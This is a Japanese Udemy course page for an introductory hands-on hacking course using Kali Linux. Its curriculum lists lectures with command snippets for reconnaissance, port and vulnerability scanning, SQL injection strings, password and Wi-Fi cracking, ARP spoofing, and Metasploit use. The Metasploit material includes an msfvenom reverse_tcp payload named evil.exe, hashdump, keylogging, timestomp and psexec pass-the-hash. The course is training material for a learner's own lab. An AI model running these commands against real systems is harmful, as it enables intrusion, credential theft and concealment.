Your cart is empty.
Keep shopping
Teach on Udemy
Turn what you know into an opportunity and reach millions around the world.
Learn More【サイバーセキュリティ ハンズオン】ハッキング技術入門(不正侵入編)
What you'll learn
- パソコンへの不正侵入/脆弱性検査に関わるツールが操作できる
Explore related topics
Course content
10 sections • 49 lectures • 9h 53m total length
- 自己紹介・この講座のねらいについて7:13
- 講座を受講する前にお願いしたいこと3:19
- 構築いただきたい演習環境16:59
https://my.vmware.com/jp/web/vmware/downloads
https://www.vmware.com/jp/products/workstation-player/workstation-player-evaluation.html
https://customerconnect.vmware.com/jp/downloads/#all_products
https://tipstour.net/windows-iso-download-from-official-site
https://www.partitionwizard.jp/partitionmanager/win10-iso-for-virtualbox-vmware.html
https://www.techspot.com/downloads/6738-kali-linux.html
https://www.kali.org/get-kali/#kali-virtual-machines
https://www.vmware.com/jp/products/workstation-player/workstation-player-evaluation.html
https://www.kali.org/get-kali/#kali-virtual-machines
https://cocolofun.co.jp/linux-upgrade/
https://yukun.info/kali-linux-vmware-tools-install/
apt update
gpg --keyserver hkp://keys.gnupg.net --recv-key 7D8D0BF6
gpg --fingerprint 7D8D0BF6
gpg -a --export 7D8D0BF6 | apt-key add -
apt update
https://www.gigafree.net/system/os/Rufus.html
ipconfig /all | more
ping <WindowsのIPアドレス>
ping <KaliLinuxのIPアドレス>
- 情報収集の概要6:47
- Whoisによるドメイン情報収集6:20
https://www.nic.ad.jp/ja/whois/
http://whois.jprs.jp/
whois
whois -h whois.jp <対象ドメインURL>
whois -h whois.jp <ハンドル名>
- Googleハッキング9:16
http://www.googleguide.com/advanced_operators_reference.html#inanchor
https://www.virustotal.com/gui/home/upload
intitle:’index of’ site:jp パスワード
intitle:confidential, filetype:xlsx
- ShodanおよびCensysによるインターネット接続機器調査6:47
https://www.shodan.io/
https://www.ipa.go.jp/files/000036921.pdf
Anonymous FTP
printer password is not set
https://censys.io/
https://www.censys.io/ipv4/help
network camera
- NetcraftによるWebサーバ情報収集7:31
https://www.netcraft.com/
https://sitereport.netcraft.com/
benesse.co.jp
udemy.benesse.co.jp
- Maltegoによるネットワーク情報収集11:14
https://www.maltego.com/
https://troushoo.blog.fc2.com/blog-entry-240.html
apt upgrade
apt install maltego
sudo maltego
- 個人情報検索サイトにおける情報収集16:11
https://www.spokeo.com/
https://www.zabasearch.com/
https://www.intelius.com/
- SNSの情報収集18:55
https://onemilliontweetmap.com/
https://github.com/x0rz/tweets_analyzer
https://developer.twitter.com/en/
https://watashinagata.com/twitter-api/
https://norari-kurari-way.com/python_twitter_api_intro/
https://kapiecii.hatenablog.com/entry/2019/03/04/220000
https://qiita.com/hoppiece_/items/b498b5b38570b4a1ed97
apt-get update
apt-get install -y git
git clone https://github.com/pyenv/pyenv.git ~/.pyenv
echo $SHELL
apt-get install -y make build-essential libssl-dev zlib1g-dev libbz2-dev
libreadline6 libreadline6-dev libreadline-dev libsqlite3-dev wget curl llvm
libncurses5-dev libncursesw5-dev xz-utils tk-dev libffi-dev liblzma-dev
python-openssl
echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.zshrc
echo ‘command -v pyenv >/dev/null || export
PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.zshrc
echo 'eval "$(pyenv init -)"' >> ~/.zshrc
source ~/.zshrc
pyenv install -list
pyenv install 3.8.0
pyenv versions
pyenv local 3.8.0
python
python local system
python
git clone https://github.com/x0rz/tweets_analyzer.git
cd tweets_analyzer
pip3 install -r requirements.txt
nano secret.py
python tweets_analyzer.py -h
python tweets_analyzer.py -n <ユーザ名> --utc-offset +32400
https://products.aspose.com/cells/ja/python-java/conversion/json-to-csv/
- digコマンドによる名前解決関連情報収集13:38
dig -h
dig <URL>
dig <URL> +noall +answer
dig -x <IPアドレス>
dig NS <URL>
dig MX <URL>
dig ANY <URL>
dig @<DNSサーバのIPアドレス> <URL>
dig @<DNSサーバのIPアドレス> chaos version.bind txt
- 偵察の概要3:54
- DumpSecによるWindowsPCの情報収集8:43
http://www.systemtools.com/somarsoft/index.html
- NBTscanによるWindowsPCの名前情報のスキャン3:05
https://ja.osdn.net/projects/sfnet_nbtscan-ipanto/
nbtscan
nbtscan <対象ネットワークのIPアドレス範囲>
- Advanced IP ScannerによるPC情報収集10:49
http://www.advanced-ip-scanner.com/jp/
apt-get install apache2
service apache2 start
service ssh start
systemctl restart ssh
useradd <ユーザ名>
passwd<ユーザ名>
netstat -ant
https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
- Superscanによるポートスキャン10:06
Superscanダウンロードサイト
https://www.filecroco.com/download-superscan/
https://www.softpedia.com/get/Network-Tools/Network-IP-Scanner/SuperScan.shtml
サイト(公開サーバ)の情報収集
whoisサーバのURL・・・whois.jp
- Nmapによるポートスキャン15:39
https://nmap.org/man/jp/
nmap
nmap -O -p <ポート番号> <攻撃対象PCのIPアドレス>
nmap -sV -sT -p <ポート番号> <攻撃対象PCのIPアドレス>
nmap -sA -p <ポート番号> <攻撃対象PCのIPアドレス>
- 脆弱性検出の概要2:22
- やられWebアプリケーションHacme Casinoのインストール3:06
https://sourceforge.net/projects/websecuritydojo/
netstat -ant
- WebScarabによるWebアプリケーション脆弱性検出27:34
webscarab
127.0.0.1
8008
nano <ファイル名 SQLi.txt>
a
b
‘) OR 1=1 --
c
d
netstat –ant
http://<DojoのIPアドレス>:3000
SQLi
’) OR 1=1 --
net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
sudo sysctl -p
- OWASPzapによるWebサイト脆弱性スキャン24:08
https://github.com/zaproxy/zaproxy
https://securitymemo.blogspot.jp/2014/11/owasp-zap-owasp-zap.html
https://security-testing.doorkeeper.jp/
https://www.pupha.net/archives/1370/
https://qiita.com/aikasu/items/6bfd33967448136b93bc
https://www.ipa.go.jp/files/000054737.pdf
https://github.com/ueno1000/secreq/tree/master/Ver.3.0
netstat -ant
apt install zaproxy
https://www.kali.org/tools/zaproxy/
http:// <対象WebサイトのIPアドレス:ポート番号>
- GVMによるホスト端末脆弱性スキャン14:30
https://community.greenbone.net/t/greenbone-upgradation-in-kali-linux-2020-2/5147
apt-get install gvm
runuser -u _gvm -- greenbone-nvt-sync
runuser -u _gvm -- greenbone-scapdata-sync
runuser -u _gvm -- greenbone-certdata-sync
gvm-check-setup
runuser -u _gvm -- gvm-manage-certs -a -f
gvm-setup
gvm-start
admin
gvm-stop
netstat -ant
- Nmapスクリプトエンジンによる脆弱性検出13:23
https://nmap.org/nsedoc/
http://n.pentest.ninja/?p=32488
nmap --script ssl-heartbleed <攻撃対象IPアドレス>
nmap -script ssl-enum-ciphers <攻撃対象IPアドレス> -p 443
apt-get install bind9 bind9utils bind9-doc
service named start
nmap -sU -p 53 -Pn --script dns-recursion <DNSサーバのIPアドレス>
nmap -p 445 --script smb-vuln-ms17-010 <攻撃対象IPアドレス>
https://github.com/mauricelambert/CVE-2022-21907/blob/main/dos_iis_2022_21907.nse
nmap -p 80 --script dos_iis_2022_21907 <攻撃対象IPアドレス>
- ランサムウェア攻撃の脆弱性検査14:35
https://www.knowbe4.com/ransomware-simulator
https://support.knowbe4.com/hc/ja/articles/229040167-RanSim製品マニュアル
https://www.knowbe4.com/ransomware-simulator
- パスワード解読の概要1:58
- Cain & AbelによるWindowsログインパスワードの解読8:12
https://www.filehorse.com/download-cain-and-abel/
http://blog.kawa-xxx.jp/entry/2016/09/24/155451
https://www.atmarkit.co.jp/ait/articles/1701/08/news034.html#_ga=2.30526589.394105326.1599017784-36965323.1586137578
https://support.microsoft.com/ja-jp/help/4026923/windows-10-create-a-local-user-or-administrator-account
- John The RipperによるKaliLinuxログインパスワードの解読5:39
http://www.openwall.com/john/
useradd <アカウント名>
passwd <アカウント名>
unshadow /etc/passwd /etc/shadow > <結合ファイル名>
chmod 400 <結合ファイル名>
john --users=<アカウント名> <結合ファイル名>
userdel <アカウント名>
- FcrackzipによるZIPファイルのパスワード解読6:12
http://oldhome.schmorp.de/marc/fcrackzip.html
sudo apt-get install fcrackzip
echo 1 > <出力ファイル名.txt>
zip -h
zip -e <ZIP圧縮後ファイル名.zip> < ZIP圧縮前ファイル名.txt >
fcrackzip -h
fcrackzip -u -v -l 4-10 <対象ZIPファイル>
- XAMMPを利用した攻撃用アプリケーション・サーバのインストール21:27
https://www.apachefriends.org/jp/index.html
https://www.webdesignleaves.com/pr/plugins/xampp_01.html
https://nendeb.com/146
https://ja.osdn.net/projects/ffftp/
http://hokori.net/archives/144
https://www.mozilla.org/ja/thunderbird/
https://www.youtube.com/watch?v=KwSq_WbVkRQ
apt update
apt install thunderbird
- Medusaによるアプリケーションログインパスワードの解読12:00
http://tech-files.com/download-medusa-password-cracker-free/
http://download.openwall.net/pub/wordlists/
service ssh start
netstat -ant
useradd <アカウント名>
passwd <アカウント名>
cat lower.lst | more
medusa -f -h <攻撃対象PCのIPアドレス> -u <アカウント名> -P <辞書> -M ssh
medusa -f -h <攻撃対象PCのIPアドレス> -u <アカウント名> -p <パスワード> -M ftp
medusa -f -h <攻撃対象PCのIPアドレス> -u <アカウント名> -P <辞書> -M ftp
- 侵入・遠隔操作の概要1:44
- 脆弱性を利用した侵入28:50
https://www.pasoble.jp/windows/10/download-previous-version.html
http://tanweb.net/2019/03/04/25641/
winver
netstat -ant
https://github.com/ollypwn/SMBGhost
python3 scanner.py <対象のIPアドレス>
sudo nmap -p445 --script cve-2020-0796 <対象のIPアドレス>
https://github.com/tango-j/CVE-2020-0796
https://www.insecurewire.com/smbghost-cve-2020-0796-remote-command-execution-demo/
https://github.com/chompie1337/SMBGhost_RCE_PoC
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444
set rhost <対象のIPアドレス>
show options
run (あるいはexploit)
python <修正したexploit.py> -ip <対象のIPアドレス>
shell
whoami
- 不正な遠隔操作20:49
shell
whoami
exit
help
sysinfo
getuid
hashdump
run checkvm
run post/windows/gather/checkvm
download <ファイル名>
upload <ファイル名>
load incognito (use incognito)
help
list_tokens -u
impersonate_token <一般権限のトークン>
ps
migrate <PID>
run post/windows/capture/keylog_recorder
cat <キーログ>
timestomp –v <ファイル名>
timestomp –c “mm/dd/year hour:minite:second” <ファイル名>
timestomp –v <ファイル名>
- PassTheHash攻撃24:52
https://www.microsoft.com/ja-jp/windows-server/trial
https://inab818.site/vmware/vmware-workstation-player-microsoft-windows-server-2019-download-install/
https://www.buffalo.jp/support/faq/detail/15257.html
https://ameblo.jp/shinnaka54/entry-12420242361.html
https://qiita.com/s_arakawa626/items/1d035b0413ab60674ccb#%E6%BA%96%E5%82%99%E3%81%99%E3%82%8B
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<攻撃端末IPアドレス> -f exe -o evil.exe
mkdir /var/www/html/share
cp evil.exe /var/www/html/share/
service apache2 restart
netstat -ant
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <攻撃端末IPアドレス>
exploit -j -z
http:// <攻撃端末IPアドレス> /share/
sessions
sessions -i <セッション番号>
getid
getsystem
hashdump
exit
https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/
msfconsole
search psexec
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <攻撃端末IPアドレス>
set LPORT 443
set RHOST <標的端末IPアドレス>
set SMBUser Administrator
set SMBPass <Administratorのパスワードハッシュ値>
exploit
getuid
shell
exit
- 無線LANクラッキングの概要1:20
- Kismetによる無線LAN情報の収集と地図表示20:16
https://www.kismetwireless.net/
https://www.youtube.com/watch?v=Lnmg_HmbEDk
https://www.jillybunch.com/sharegps/nmea-bluetooth-linux.html
https://support.google.com/accounts/answer/3467281?hl=ja
http://andmem.blogspot.jp/2012/10/androiddebugmode.html
ifconfig
lsmod | grep bluetooth
systemctl enable bluetooth.service
systemctl start bluetooth.service
apt-get update
apt-get install gpsd
nano /etc/kismet/kismet.conf
source=wlan0
gps=serial:device=/dev/rfcomm#
gpsd -h
kismet -h
hcitool scan
sdptool browse <スマホ端末のMACアドレス>
cd /dev
ls
rfcomm connect /dev/rfcomm0 <Bluetoothアドレス><チャネル番号>
gpsd -N -n -D5 /dev/rfcomm0
kismet
localhost:2501
ls
kismetdb_to_kml --in <kismetファイル名> --out <kmlファイル名>
ls
nano <kmlファイル名>
- Aircrack-ngによるWEPパスワード解読13:12
https://www.aircrack-ng.org/downloads.html
https://thinkit.co.jp/article/838/1
http://bibo-log.blog.so-net.ne.jp/2010-08-13
iwconfig
airmon-ng start wlan0
iwconfig
airodump-ng --help
airodump-ng <インタフェース 例.wlan0mon>
airodump-ng --channel <チャネル> --bssid <チャネル> -w <出力ファイル名例.out0> <インタフェース例.wlan0mon >
aircrack-ng --help
aircrack-ng <ファイル名>
- coWPAttyによるWPA/WPA2-PSKパスワード解読22:25
apt install cowpatty
iwconfig
airmon-ng start wlan0
airodump-ng <インタフェース 例.wlan0mon>
airodump-ng -c <チャネル> --bssid <bssid名> -w <出力ファイル名例.cpt0> <インタフェース例.wlan0mon >
cowpatty -h
cowpatty -r <収集したパケットファイル名 例.cpt0-01.cap > -f <辞書名.例.lower+.lst> -s ‘SSID’
genpmk -h
genpmk -f <辞書名.例.lower+.lst> -d <レインボーテーブル名 例.rainbow0.tbl > -s ‘SSID’
cowpatty -r <収集したパケットファイル名 例.cpt0-01.cap > -d <レインボーテーブル名 例.rainbow0.tbl > -s ‘SSID’
- Kracks脆弱性の検査13:23
https://dev.classmethod.jp/articles/wpa2-vulnerability-krack/
https://github.com/vanhoefm/krackattacks-scripts
apt update
apt install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils virtualenv
git clone https://github.com/vanhoefm/krackattacks-scripts
cd krackattacks-scripts
ls
cd krackattacs
cat requirement.txt
pip3 install pycryptodome==3.9.9
pip3 install scapy==2.4.4
./pysetup.sh
apt-get install python3-venv
./pysetup.sh
./disable-hwcrypto.sh
reboot
./reenable-hwcrypto.sh
cd krackattacks-scripts/krackattacs
./build.sh
iwconfig
nano -l hostapd.conf
rfkill unblock wifi
source venv/bin/activate
./krack-test-client.py -h
ifconfig
wpa_supplicant -v
./krack-test-client.py
https://github.com/lucascouto/krackattack-all-zero-tk-key
- なりすましの概要1:05
- VPNbookによるIPアドレスの変更12:55
apt install openvpn
https://www.vpnbook.com/
http://whatismyipaddress.com/
ifconfig
netstat -ant
unzip <VPNbookサーバ設定ソフト名>
openvpn <ファイル名.例.vpnbook-euro1-tcp80.ovpn>
ifconfig
netstat -ant
traceroure <VPNbookから付与されたグローバルIPアドレス>
- EttercapによるARPスプーフィングと中間者攻撃14:24
https://www.ettercap-project.org/downloads.html
ipconfig /all
arp -a
ifconfig
arp -a
- Fluxionによるアクセスポイントのなりすまし27:07
https://github.com/FluxionNetwork/fluxion.git
https://miloserdov.org/?p=1143
https://ciksiti.com/ja/chapters/1519-fluxion-kali-linux-tutorial--linux-hint
ifconfig
iwconfig
git clone https://github.com/FluxionNetwork/fluxion.git
cd fluxion
./fluxion.sh -i
startx
- 盗聴・改ざんの概要1:48
- Wiresharkによるパケットの盗聴8:49
https://www.wireshark.org/
ipconfig
- mitmproxyによるHTTPS通信盗聴15:56
https://docs.mitmproxy.org/stable/
apt-get install mitmproxy
https://gist.github.com/jkullick/5fef12be74ffbfc6f8e5d9f6f9194879
https://kagasu.hatenablog.com/entry/2018/01/20/095013
http://mitm.it
https://jp.globalsign.com/support/faq/558.html
https://support.kaonavi.jp/function-admin/secure-access/009/
ifconfig
mitmproxy -h
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
ipconfig /all
apt install dsniff
arpspoof -h
arpspoof -i <インタフェース> -t <攻撃対象PCのIPアドレス> -r <デフォルトゲートウエイのIPアドレス>
arp -a
mitmproxy --mode transparent
- SQLインジェクションを用いたデータベースの改ざん14:15
’) OR 1=1 --
登録ユーザID’)--
ipconfig
bobby_blackjack’) --
- プロキシツールを利用したオンラインゲームのチート19:00
https://portswigger.net/burp
http://tech.pjin.jp/blog/2016/07/08/burp-suite-1-7の使い方%E3%80%80その1/
https://playingcards.jp/game_rules/blackjack_rules.html
netstat -ant
ifconfig
<DojoのIPアドレス>:3000
bobby_blackjack’) --
<DojoのIPアドレス>:3000/blackjack/hit_or_stay?act=S
Requirements
- Windows,Linuxのコマンド入力が可能な方
- インターネット,パソコンの基礎知識が必要
Description
サイバー犯罪対策として攻撃者の手法を理解し実践することが重要です。
本コースでは「Kali Linux」を用いたハンズオン形式で、パソコンやネットワークに対する攻撃手法とその対策を学習します。
受講条件
コンピュータやインターネットの基礎知識を有すること
Windows及びLinuxのコマンドラインインタフェース(CUI)で操作可能であることが望ましい。
コンピュータ操作やツールマニュアルの理解に必要な英語力(高校英語程度)があると、本コースの理解度がより高まります。
演習環境を自前で構築し、自らツールを操作することで内容の理解度が高まります。なお、環境構築が難しい場合、ビデオ閲覧のみでも理解できるような内容となっています。
演習環境の条件
Windows(Windows10推奨)、KaliLinux(RollingEdition推奨)各一台を所有するLAN環境が必要です
LANはインターネット接続がされていること
メディアは有線・無線のどちらでもOK。ただし、無線LANのクラッキングには無線インタフェースを持つマシンが必要です。
講座受講に関するお願い事項
※ レクチャー2で詳しく説明しています。必ず確認してください。※
演習は受講者自身が管理している環境内で実施してください。
ハッキング技術を許可なく外部に実施したり、犯罪目的で使用しないでください。犯罪目的で使用した場合、各法令に基づき処罰されることがあります。
本コースにより受講者のパソコンやインターネットの利用に不具合が生じても責任を負いかねますので予めご了承ください。
可能な限り、演習環境は日頃使用しているパソコンとは別のものを利用してください。
演習に使用するパソコンに重要な情報がないか、事前に確認してください。
不具合が生じた場合に備え、バックアップを取るなど回復手段を準備してください。
Who this course is for:
- 企業などのセキュリティ担当者,ハッキング技術を学びたい方
- セキュリティ関係の仕事に突きたいので、実践的スキルを習得したいという方
- セキュリティテスト(ペネトレーションテスト)を実施したいが、具体的な進め方がわからないという方
- CSIRT(Computer Security Incident Response Team)のメンバになったので、必要なスキルを理解したいという方